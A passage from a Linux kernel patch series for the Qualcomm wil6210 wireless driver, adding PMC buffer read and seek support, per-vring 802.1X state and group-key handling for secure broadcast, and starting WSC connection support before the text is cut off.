+ */ +ssize_t wil_pmc_read(struct file *filp, char __user *buf, size_t count, + loff_t *f_pos) +{ + struct wil6210_priv *wil = filp->private_data; + struct pmc_ctx *pmc = &wil->pmc; + size_t retval = 0; + unsigned long long idx; + loff_t offset; + size_t pmc_size = pmc->descriptor_size * pmc->num_descriptors; + + mutex_lock(&pmc->lock); + + if (!wil_is_pmc_allocated(pmc)) { + wil_err(wil, "%s: error, pmc is not allocated!\n", __func__); + pmc->last_cmd_status = -EPERM; + mutex_unlock(&pmc->lock); + return -EPERM; + } + + wil_dbg_misc(wil, + "%s: size %u, pos %lld\n", + __func__, (unsigned)count, *f_pos); + + pmc->last_cmd_status = 0; + + idx = *f_pos; + do_div(idx, pmc->descriptor_size); + offset = *f_pos - (idx * pmc->descriptor_size); + + if (*f_pos >= pmc_size) { + wil_dbg_misc(wil, "%s: reached end of pmc buf: %lld >= %u\n", + __func__, *f_pos, (unsigned)pmc_size); + pmc->last_cmd_status = -ERANGE; + goto out; + } + + wil_dbg_misc(wil, + "%s: read from pos %lld (descriptor %llu, offset %llu) %zu bytes\n", + __func__, *f_pos, idx, offset, count); + + /* if no errors, return the copied byte count */ + retval = simple_read_from_buffer(buf, + count, + &offset, + pmc->descriptors[idx].va, + pmc->descriptor_size); + *f_pos += retval; +out: + mutex_unlock(&pmc->lock); + + return retval; +} + +loff_t wil_pmc_llseek(struct file *filp, loff_t off, int whence) +{ + loff_t newpos; + struct wil6210_priv *wil = filp->private_data; + struct pmc_ctx *pmc = &wil->pmc; + size_t pmc_size = pmc->descriptor_size * pmc->num_descriptors; + + switch (whence) { + case 0: /* SEEK_SET */ + newpos = off; + break; + + case 1: /* SEEK_CUR */ + newpos = filp->f_pos + off; + break; + + case 2: /* SEEK_END */ + newpos = pmc_size; + break; + + default: /* can't happen */ + return -EINVAL; + } + + if (newpos < 0) + return -EINVAL; + if (newpos > pmc_size) + newpos = pmc_size; + + filp->f_pos = newpos; + + return newpos; +} diff --git a/drivers/net/wireless/ath/wil6210/pmc.h b/drivers/net/wireless/ath/wil6210/pmc.h new file mode 100644 index 000000000000..bebc8d52e1e6 --- /dev/null +++ b/drivers/net/wireless/ath/wil6210/pmc.h @@ -0,0 +1,27 @@ +/* + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
+ */ + +#include + +#define PCM_DATA_INVALID_DW_VAL (0xB0BA0000) + +void wil_pmc_init(struct wil6210_priv *wil); +void wil_pmc_alloc(struct wil6210_priv *wil, + int num_descriptors, int descriptor_size); +void wil_pmc_free(struct wil6210_priv *wil, int send_pmc_cmd); +int wil_pmc_last_cmd_status(struct wil6210_priv *wil); +ssize_t wil_pmc_read(struct file *, char __user *, size_t, loff_t *); +loff_t wil_pmc_llseek(struct file *filp, loff_t off, int whence); diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index abb2080d3fa1..9d74bd819236 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -21,6 +21,7 @@ #include #include #include +#include #include "wil_platform.h" extern bool no_fw_recovery; @@ -527,6 +528,17 @@ struct wil_probe_client_req { u8 cid; }; +struct pmc_ctx { + /* alloc, free, and read operations must own the lock */ + struct mutex lock; + struct vring_tx_desc *pring_va; + dma_addr_t pring_pa; + struct desc_alloc_info *descriptors; + int last_cmd_status; + int num_descriptors; + int descriptor_size; +}; + struct wil6210_priv { struct pci_dev *pdev; int n_msi; @@ -611,6 +623,8 @@ struct wil6210_priv { void *platform_handle; struct wil_platform_ops platform_ops; + + struct pmc_ctx pmc; }; #define wil_to_wiphy(i) (i->wdev->wiphy) diff --git a/drivers/net/wireless/ath/wil6210/wmi.h b/drivers/net/wireless/ath/wil6210/wmi.h index b29055315350..24c253d91363 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.h +++ b/drivers/net/wireless/ath/wil6210/wmi.h @@ -835,6 +835,21 @@ struct wmi_temp_sense_cmd { __le32 measure_mode; } __packed; +/* + * WMI_PMC_CMDID + */ +enum wmi_pmc_op_e { + WMI_PMC_ALLOCATE = 0, + WMI_PMC_RELEASE = 1, +}; + +struct wmi_pmc_cmd { + u8 op; /* enum wmi_pmc_cmd_op_type */ + u8 reserved; + __le16 ring_size; + __le64 mem_base; +} __packed; + /* * WMI Events */ From 230d8442f452509b371e8765218b3a876d5b575c Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:10 +0300 Subject: [PATCH 020/872] wil6210: broadcast for secure link Introduce 2 types of GTK, Tx (for this STA) and Rx (for each peer). Now, AP has only Tx GTK, STA - only Rx one. PBSS not supported yet; for it, continue using pseudo-DMS. Handle per-vring .1x state, update it from WMI_VRING_EN_EVENTID event. This allows unification for unicast and broadcast vrings. 
This mechanism replaces former per-CID "data_port_open" Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 64 ++++++++++++++----- drivers/net/wireless/ath/wil6210/debugfs.c | 14 ++--- drivers/net/wireless/ath/wil6210/main.c | 6 +- drivers/net/wireless/ath/wil6210/txrx.c | 46 +++++++------- drivers/net/wireless/ath/wil6210/wil6210.h | 7 ++- drivers/net/wireless/ath/wil6210/wmi.c | 68 ++++++--------------- drivers/net/wireless/ath/wil6210/wmi.h | 25 +++++--- 7 files changed, 124 insertions(+), 106 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index f53a1908fae2..1b02b73c4212 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -425,10 +425,17 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, wil->privacy = sme->privacy; if (wil->privacy) { - /* For secure assoc, send WMI_DELETE_CIPHER_KEY_CMD */ - rc = wmi_del_cipher_key(wil, 0, bss->bssid); + /* For secure assoc, remove old keys */ + rc = wmi_del_cipher_key(wil, 0, bss->bssid, + WMI_KEY_USE_PAIRWISE); if (rc) { - wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD failed\n"); + wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD(PTK) failed\n"); + goto out; + } + rc = wmi_del_cipher_key(wil, 0, bss->bssid, + WMI_KEY_USE_RX_GROUP); + if (rc) { + wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD(GTK) failed\n"); goto out; } } @@ -462,6 +469,8 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, conn.auth_mode = WMI_AUTH_WPA2_PSK; conn.pairwise_crypto_type = WMI_CRYPT_AES_GCMP; conn.pairwise_crypto_len = 16; + conn.group_crypto_type = WMI_CRYPT_AES_GCMP; + conn.group_crypto_len = 16; } else { conn.dot11_auth_mode = WMI_AUTH11_OPEN; conn.auth_mode = WMI_AUTH_NONE; @@ -563,6 +572,39 @@ static int wil_cfg80211_set_channel(struct wiphy *wiphy, return 0; } +static enum wmi_key_usage wil_detect_key_usage(struct wil6210_priv *wil, + bool pairwise) +{ + struct wireless_dev *wdev = wil->wdev; + enum wmi_key_usage rc; + static const char * const key_usage_str[] = { + [WMI_KEY_USE_PAIRWISE] = "WMI_KEY_USE_PAIRWISE", + [WMI_KEY_USE_RX_GROUP] = "WMI_KEY_USE_RX_GROUP", + [WMI_KEY_USE_TX_GROUP] = "WMI_KEY_USE_TX_GROUP", + }; + + if (pairwise) { + rc = WMI_KEY_USE_PAIRWISE; + } else { + switch (wdev->iftype) { + case NL80211_IFTYPE_STATION: + rc = WMI_KEY_USE_RX_GROUP; + break; + case NL80211_IFTYPE_AP: + rc = WMI_KEY_USE_TX_GROUP; + break; + default: + /* TODO: Rx GTK or Tx GTK? */ + wil_err(wil, "Can't determine GTK type\n"); + rc = WMI_KEY_USE_RX_GROUP; + break; + } + } + wil_dbg_misc(wil, "%s() -> %s\n", __func__, key_usage_str[rc]); + + return rc; +} + static int wil_cfg80211_add_key(struct wiphy *wiphy, struct net_device *ndev, u8 key_index, bool pairwise, @@ -570,16 +612,13 @@ static int wil_cfg80211_add_key(struct wiphy *wiphy, struct key_params *params) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + enum wmi_key_usage key_usage = wil_detect_key_usage(wil, pairwise); wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, pairwise ? 
"PTK" : "GTK"); - /* group key is not used */ - if (!pairwise) - return 0; - - return wmi_add_cipher_key(wil, key_index, mac_addr, - params->key_len, params->key); + return wmi_add_cipher_key(wil, key_index, mac_addr, params->key_len, + params->key, key_usage); } static int wil_cfg80211_del_key(struct wiphy *wiphy, @@ -588,15 +627,12 @@ static int wil_cfg80211_del_key(struct wiphy *wiphy, const u8 *mac_addr) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + enum wmi_key_usage key_usage = wil_detect_key_usage(wil, pairwise); wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, pairwise ? "PTK" : "GTK"); - /* group key is not used */ - if (!pairwise) - return 0; - - return wmi_del_cipher_key(wil, key_index, mac_addr); + return wmi_del_cipher_key(wil, key_index, mac_addr, key_usage); } /* Need to be present or wiphy_new() will WARN */ diff --git a/drivers/net/wireless/ath/wil6210/debugfs.c b/drivers/net/wireless/ath/wil6210/debugfs.c index 19f77e55dc53..8f9c0722a801 100644 --- a/drivers/net/wireless/ath/wil6210/debugfs.c +++ b/drivers/net/wireless/ath/wil6210/debugfs.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -124,15 +124,17 @@ static int wil_vring_debugfs_show(struct seq_file *s, void *data) if (cid < WIL6210_MAX_CID) seq_printf(s, - "\n%pM CID %d TID %d BACK([%u] %u TU A%s) [%3d|%3d] idle %s\n", + "\n%pM CID %d TID %d 1x%s BACK([%u] %u TU A%s) [%3d|%3d] idle %s\n", wil->sta[cid].addr, cid, tid, + txdata->dot1x_open ? "+" : "-", txdata->agg_wsize, txdata->agg_timeout, txdata->agg_amsdu ? "+" : "-", used, avail, sidle); else seq_printf(s, - "\nBroadcast [%3d|%3d] idle %s\n", + "\nBroadcast 1x%s [%3d|%3d] idle %s\n", + txdata->dot1x_open ? "+" : "-", used, avail, sidle); wil_print_vring(s, wil, name, vring, '_', 'H'); @@ -1195,8 +1197,7 @@ static int wil_link_debugfs_show(struct seq_file *s, void *data) status = "connected"; break; } - seq_printf(s, "[%d] %pM %s%s\n", i, p->addr, status, - (p->data_port_open ? " data_port_open" : "")); + seq_printf(s, "[%d] %pM %s\n", i, p->addr, status); if (p->status == wil_sta_connected) { rc = wil_cid_fill_sinfo(wil, i, &sinfo); @@ -1376,8 +1377,7 @@ __acquires(&p->tid_rx_lock) __releases(&p->tid_rx_lock) status = "connected"; break; } - seq_printf(s, "[%d] %pM %s%s\n", i, p->addr, status, - (p->data_port_open ? 
" data_port_open" : "")); + seq_printf(s, "[%d] %pM %s\n", i, p->addr, status); if (p->status == wil_sta_connected) { spin_lock_bh(&p->tid_rx_lock); diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index 146fd8088fde..ef3b6bca8cb5 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -150,7 +150,6 @@ __acquires(&sta->tid_rx_lock) __releases(&sta->tid_rx_lock) wil_dbg_misc(wil, "%s(CID %d, status %d)\n", __func__, cid, sta->status); - sta->data_port_open = false; if (sta->status != wil_sta_unused) { if (!from_event) wmi_disconnect_sta(wil, sta->addr, reason_code); @@ -377,9 +376,10 @@ int wil_bcast_init(struct wil6210_priv *wil) if (ri < 0) return ri; + wil->bcast_vring = ri; rc = wil_vring_init_bcast(wil, ri, 1 << bcast_ring_order); - if (rc == 0) - wil->bcast_vring = ri; + if (rc) + wil->bcast_vring = -1; return rc; } diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c index 1fd34e5e9824..0113dac3a9a9 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.c +++ b/drivers/net/wireless/ath/wil6210/txrx.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -724,6 +724,8 @@ int wil_vring_init_tx(struct wil6210_priv *wil, int id, int size, cmd.vring_cfg.tx_sw_ring.ring_mem_base = cpu_to_le64(vring->pa); + if (!wil->privacy) + txdata->dot1x_open = true; rc = wmi_call(wil, WMI_VRING_CFG_CMDID, &cmd, sizeof(cmd), WMI_VRING_CFG_DONE_EVENTID, &reply, sizeof(reply), 100); if (rc) @@ -738,11 +740,13 @@ int wil_vring_init_tx(struct wil6210_priv *wil, int id, int size, vring->hwtail = le32_to_cpu(reply.cmd.tx_vring_tail_ptr); txdata->enabled = 1; - if (wil->sta[cid].data_port_open && (agg_wsize >= 0)) + if (txdata->dot1x_open && (agg_wsize >= 0)) wil_addba_tx_request(wil, id, agg_wsize); return 0; out_free: + txdata->dot1x_open = false; + txdata->enabled = 0; wil_vring_free(wil, vring, 1); out: @@ -792,6 +796,8 @@ int wil_vring_init_bcast(struct wil6210_priv *wil, int id, int size) cmd.vring_cfg.tx_sw_ring.ring_mem_base = cpu_to_le64(vring->pa); + if (!wil->privacy) + txdata->dot1x_open = true; rc = wmi_call(wil, WMI_BCAST_VRING_CFG_CMDID, &cmd, sizeof(cmd), WMI_VRING_CFG_DONE_EVENTID, &reply, sizeof(reply), 100); if (rc) @@ -809,6 +815,8 @@ int wil_vring_init_bcast(struct wil6210_priv *wil, int id, int size) return 0; out_free: + txdata->enabled = 0; + txdata->dot1x_open = false; wil_vring_free(wil, vring, 1); out: @@ -828,6 +836,7 @@ void wil_vring_fini_tx(struct wil6210_priv *wil, int id) wil_dbg_misc(wil, "%s() id=%d\n", __func__, id); spin_lock_bh(&txdata->lock); + txdata->dot1x_open = false; txdata->enabled = 0; /* no Tx can be in progress or start anew */ spin_unlock_bh(&txdata->lock); /* make sure NAPI won't touch this vring */ @@ -848,12 +857,11 @@ static struct vring *wil_find_tx_ucast(struct wil6210_priv *wil, if (cid < 0) return NULL; - if (!wil->sta[cid].data_port_open && - (skb->protocol != cpu_to_be16(ETH_P_PAE))) - return NULL; - /* TODO: fix for multiple TID */ for (i = 0; i < ARRAY_SIZE(wil->vring2cid_tid); i++) { + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) + continue; if (wil->vring2cid_tid[i][0] == cid) { struct vring *v = &wil->vring_tx[i]; @@ -883,7 +891,7 @@ static struct vring 
*wil_find_tx_vring_sta(struct wil6210_priv *wil, /* In the STA mode, it is expected to have only 1 VRING * for the AP we connected to. - * find 1-st vring and see whether it is eligible for data + * find 1-st vring eligible for this skb and use it. */ for (i = 0; i < WIL6210_MAX_TX_RINGS; i++) { v = &wil->vring_tx[i]; @@ -894,9 +902,9 @@ static struct vring *wil_find_tx_vring_sta(struct wil6210_priv *wil, if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open && + if (!wil->vring_tx_data[i].dot1x_open && (skb->protocol != cpu_to_be16(ETH_P_PAE))) - break; + continue; wil_dbg_txrx(wil, "Tx -> ring %d\n", i); @@ -918,7 +926,6 @@ static struct vring *wil_find_tx_vring_sta(struct wil6210_priv *wil, * in all cases override dest address to unicast peer's address * Use old strategy when new is not supported yet: * - for PBSS - * - for secure link */ static struct vring *wil_find_tx_bcast_1(struct wil6210_priv *wil, struct sk_buff *skb) @@ -931,6 +938,9 @@ static struct vring *wil_find_tx_bcast_1(struct wil6210_priv *wil, v = &wil->vring_tx[i]; if (!v->va) return NULL; + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) + return NULL; return v; } @@ -963,7 +973,8 @@ static struct vring *wil_find_tx_bcast_2(struct wil6210_priv *wil, cid = wil->vring2cid_tid[i][0]; if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open) + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) continue; /* don't Tx back to source when re-routing Rx->Tx at the AP */ @@ -989,7 +1000,8 @@ static struct vring *wil_find_tx_bcast_2(struct wil6210_priv *wil, cid = wil->vring2cid_tid[i][0]; if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open) + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) continue; if (0 == memcmp(wil->sta[cid].addr, src, ETH_ALEN)) @@ -1016,9 +1028,6 @@ static struct vring *wil_find_tx_bcast(struct wil6210_priv *wil, if (wdev->iftype != NL80211_IFTYPE_AP) return wil_find_tx_bcast_2(wil, skb); - if (wil->privacy) - return wil_find_tx_bcast_2(wil, skb); - return wil_find_tx_bcast_1(wil, skb); } @@ -1144,13 +1153,8 @@ static int __wil_tx_vring(struct wil6210_priv *wil, struct vring *vring, wil_tx_desc_map(d, pa, len, vring_index); if (unlikely(mcast)) { d->mac.d[0] |= BIT(MAC_CFG_DESC_TX_0_MCS_EN_POS); /* MCS 0 */ - if (unlikely(len > WIL_BCAST_MCS0_LIMIT)) { - /* set MCS 1 */ + if (unlikely(len > WIL_BCAST_MCS0_LIMIT)) /* set MCS 1 */ d->mac.d[0] |= (1 << MAC_CFG_DESC_TX_0_MCS_INDEX_POS); - /* packet mode 2 */ - d->mac.d[1] |= BIT(MAC_CFG_DESC_TX_1_PKT_MODE_EN_POS) | - (2 << MAC_CFG_DESC_TX_1_PKT_MODE_POS); - } } /* Process TCP/UDP checksum offloading */ if (unlikely(wil_tx_desc_offload_cksum_set(wil, d, skb))) { diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index 9d74bd819236..f3513a1fa424 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -398,6 +398,7 @@ struct vring { * Additional data for Tx Vring */ struct vring_tx_data { + bool dot1x_open; int enabled; cycles_t idle, last_idle, begin; u8 agg_wsize; /* agreed aggregation window, 0 - no agg */ @@ -486,7 +487,6 @@ struct wil_sta_info { u8 addr[ETH_ALEN]; enum wil_sta_status status; struct wil_net_stats stats; - bool data_port_open; /* can send any data, not only EAPOL */ /* Rx BACK */ struct wil_tid_ampdu_rx 
*tid_rx[WIL_STA_TID_NUM]; spinlock_t tid_rx_lock; /* guarding tid_rx array */ @@ -716,9 +716,10 @@ int wmi_get_ssid(struct wil6210_priv *wil, u8 *ssid_len, void *ssid); int wmi_set_channel(struct wil6210_priv *wil, int channel); int wmi_get_channel(struct wil6210_priv *wil, int *channel); int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr); + const void *mac_addr, int key_usage); int wmi_add_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr, int key_len, const void *key); + const void *mac_addr, int key_len, const void *key, + int key_usage); int wmi_echo(struct wil6210_priv *wil); int wmi_set_ie(struct wil6210_priv *wil, u8 type, u16 ie_len, const void *ie); int wmi_rx_chain_add(struct wil6210_priv *wil, struct vring *vring); diff --git a/drivers/net/wireless/ath/wil6210/wmi.c b/drivers/net/wireless/ath/wil6210/wmi.c index 04fad5f4bbea..3dc8daf69bd2 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.c +++ b/drivers/net/wireless/ath/wil6210/wmi.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -543,55 +543,22 @@ static void wmi_evt_eapol_rx(struct wil6210_priv *wil, int id, } } -static void wil_addba_tx_cid(struct wil6210_priv *wil, u8 cid, u16 wsize) +static void wmi_evt_vring_en(struct wil6210_priv *wil, int id, void *d, int len) { - struct vring_tx_data *t; - int i; + struct wmi_vring_en_event *evt = d; + u8 vri = evt->vring_index; - for (i = 0; i < WIL6210_MAX_TX_RINGS; i++) { - if (cid != wil->vring2cid_tid[i][0]) - continue; - t = &wil->vring_tx_data[i]; - if (!t->enabled) - continue; + wil_dbg_wmi(wil, "Enable vring %d\n", vri); - wil_addba_tx_request(wil, i, wsize); - } -} - -static void wmi_evt_linkup(struct wil6210_priv *wil, int id, void *d, int len) -{ - struct wmi_data_port_open_event *evt = d; - u8 cid = evt->cid; - - wil_dbg_wmi(wil, "Link UP for CID %d\n", cid); - - if (cid >= ARRAY_SIZE(wil->sta)) { - wil_err(wil, "Link UP for invalid CID %d\n", cid); + if (vri >= ARRAY_SIZE(wil->vring_tx)) { + wil_err(wil, "Enable for invalid vring %d\n", vri); return; } - - wil->sta[cid].data_port_open = true; - if (agg_wsize >= 0) - wil_addba_tx_cid(wil, cid, agg_wsize); -} - -static void wmi_evt_linkdown(struct wil6210_priv *wil, int id, void *d, int len) -{ - struct net_device *ndev = wil_to_ndev(wil); - struct wmi_wbe_link_down_event *evt = d; - u8 cid = evt->cid; - - wil_dbg_wmi(wil, "Link DOWN for CID %d, reason %d\n", - cid, le32_to_cpu(evt->reason)); - - if (cid >= ARRAY_SIZE(wil->sta)) { - wil_err(wil, "Link DOWN for invalid CID %d\n", cid); + wil->vring_tx_data[vri].dot1x_open = true; + if (vri == wil->bcast_vring) /* no BA for bcast */ return; - } - - wil->sta[cid].data_port_open = false; - netif_carrier_off(ndev); + if (agg_wsize >= 0) + wil_addba_tx_request(wil, vri, agg_wsize); } static void wmi_evt_ba_status(struct wil6210_priv *wil, int id, void *d, @@ -695,11 +662,10 @@ static const struct { {WMI_CONNECT_EVENTID, wmi_evt_connect}, {WMI_DISCONNECT_EVENTID, wmi_evt_disconnect}, {WMI_EAPOL_RX_EVENTID, wmi_evt_eapol_rx}, - {WMI_DATA_PORT_OPEN_EVENTID, wmi_evt_linkup}, - {WMI_WBE_LINKDOWN_EVENTID, wmi_evt_linkdown}, {WMI_BA_STATUS_EVENTID, wmi_evt_ba_status}, {WMI_RCP_ADDBA_REQ_EVENTID, wmi_evt_addba_rx_req}, {WMI_DELBA_EVENTID, wmi_evt_delba}, + {WMI_VRING_EN_EVENTID, wmi_evt_vring_en}, }; /* @@ 
-985,7 +951,7 @@ int wmi_p2p_cfg(struct wil6210_priv *wil, int channel) } int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr) + const void *mac_addr, int key_usage) { struct wmi_delete_cipher_key_cmd cmd = { .key_index = key_index, @@ -998,11 +964,12 @@ int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, } int wmi_add_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr, int key_len, const void *key) + const void *mac_addr, int key_len, const void *key, + int key_usage) { struct wmi_add_cipher_key_cmd cmd = { .key_index = key_index, - .key_usage = WMI_KEY_USE_PAIRWISE, + .key_usage = key_usage, .key_len = key_len, }; @@ -1238,7 +1205,8 @@ int wmi_addba_rx_resp(struct wil6210_priv *wil, u8 cid, u8 tid, u8 token, cid, tid, agg_wsize, timeout, status, amsdu ? "+" : "-"); rc = wmi_call(wil, WMI_RCP_ADDBA_RESP_CMDID, &cmd, sizeof(cmd), - WMI_ADDBA_RESP_SENT_EVENTID, &reply, sizeof(reply), 100); + WMI_RCP_ADDBA_RESP_SENT_EVENTID, &reply, sizeof(reply), + 100); if (rc) return rc; diff --git a/drivers/net/wireless/ath/wil6210/wmi.h b/drivers/net/wireless/ath/wil6210/wmi.h index 24c253d91363..cc04ab73b398 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.h +++ b/drivers/net/wireless/ath/wil6210/wmi.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * Copyright (c) 2006-2012 Wilocity . * * Permission to use, copy, modify, and/or distribute this software for any @@ -253,8 +253,8 @@ struct wmi_set_passphrase_cmd { */ enum wmi_key_usage { WMI_KEY_USE_PAIRWISE = 0, - WMI_KEY_USE_GROUP = 1, - WMI_KEY_USE_TX = 2, /* default Tx Key - Static WEP only */ + WMI_KEY_USE_RX_GROUP = 1, + WMI_KEY_USE_TX_GROUP = 2, }; struct wmi_add_cipher_key_cmd { @@ -885,7 +885,7 @@ enum wmi_event_id { WMI_VRING_CFG_DONE_EVENTID = 0x1821, WMI_BA_STATUS_EVENTID = 0x1823, WMI_RCP_ADDBA_REQ_EVENTID = 0x1824, - WMI_ADDBA_RESP_SENT_EVENTID = 0x1825, + WMI_RCP_ADDBA_RESP_SENT_EVENTID = 0x1825, WMI_DELBA_EVENTID = 0x1826, WMI_GET_SSID_EVENTID = 0x1828, WMI_GET_PCP_CHANNEL_EVENTID = 0x182a, @@ -897,7 +897,7 @@ enum wmi_event_id { WMI_WRITE_MAC_TXQ_EVENTID = 0x1833, WMI_WRITE_MAC_XQ_FIELD_EVENTID = 0x1834, - WMI_BEAFORMING_MGMT_DONE_EVENTID = 0x1836, + WMI_BEAMFORMING_MGMT_DONE_EVENTID = 0x1836, WMI_BF_TXSS_MGMT_DONE_EVENTID = 0x1837, WMI_BF_RXSS_MGMT_DONE_EVENTID = 0x1839, WMI_RS_MGMT_DONE_EVENTID = 0x1852, @@ -909,11 +909,12 @@ enum wmi_event_id { /* Performance monitoring events */ WMI_DATA_PORT_OPEN_EVENTID = 0x1860, - WMI_WBE_LINKDOWN_EVENTID = 0x1861, + WMI_WBE_LINK_DOWN_EVENTID = 0x1861, WMI_BF_CTRL_DONE_EVENTID = 0x1862, WMI_NOTIFY_REQ_DONE_EVENTID = 0x1863, WMI_GET_STATUS_DONE_EVENTID = 0x1864, + WMI_VRING_EN_EVENTID = 0x1865, WMI_UNIT_TEST_EVENTID = 0x1900, WMI_FLASH_READ_DONE_EVENTID = 0x1902, @@ -1162,7 +1163,7 @@ struct wmi_vring_cfg_done_event { } __packed; /* - * WMI_ADDBA_RESP_SENT_EVENTID + * WMI_RCP_ADDBA_RESP_SENT_EVENTID */ struct wmi_rcp_addba_resp_sent_event { u8 cidxtid; @@ -1194,7 +1195,7 @@ struct wmi_cfg_rx_chain_done_event { } __packed; /* - * WMI_WBE_LINKDOWN_EVENTID + * WMI_WBE_LINK_DOWN_EVENTID */ enum wmi_wbe_link_down_event_reason { WMI_WBE_REASON_USER_REQUEST = 0, @@ -1216,6 +1217,14 @@ struct wmi_data_port_open_event { u8 reserved[3]; } __packed; +/* + * WMI_VRING_EN_EVENTID + */ +struct wmi_vring_en_event { + u8 vring_index; + u8 reserved[3]; +} __packed; + /* * WMI_GET_PCP_CHANNEL_EVENTID */ From 27aa6b71d3ddd8e94613a890f06474db812cf591 Mon Sep 17 00:00:00 2001 
From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:11 +0300 Subject: [PATCH 021/872] wil6210: support WSC for STA mode WSC connection is secure (privacy bit set in various frames) but authentication suite, keys etc. are absent. Support this mode in the connect WMI command. Detect WSC by having 'sme->privacy' and no RSN IE. Inform firmware about WSC session by setting dot11_auth_mode to WMI_AUTH11_WSC. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 26 +++++++++++---------- 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 1b02b73c4212..dbfcdd16628a 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -402,11 +402,8 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, rsn_eid = sme->ie ? cfg80211_find_ie(WLAN_EID_RSN, sme->ie, sme->ie_len) : NULL; - - if (sme->privacy && !rsn_eid) { - wil_err(wil, "Missing RSN IE for secure connection\n"); - return -EINVAL; - } + if (sme->privacy && !rsn_eid) + wil_info(wil, "WSC connection\n"); bss = cfg80211_get_bss(wiphy, sme->channel, sme->bssid, sme->ssid, sme->ssid_len, @@ -465,13 +462,18 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, goto out; } if (wil->privacy) { - conn.dot11_auth_mode = WMI_AUTH11_SHARED; - conn.auth_mode = WMI_AUTH_WPA2_PSK; - conn.pairwise_crypto_type = 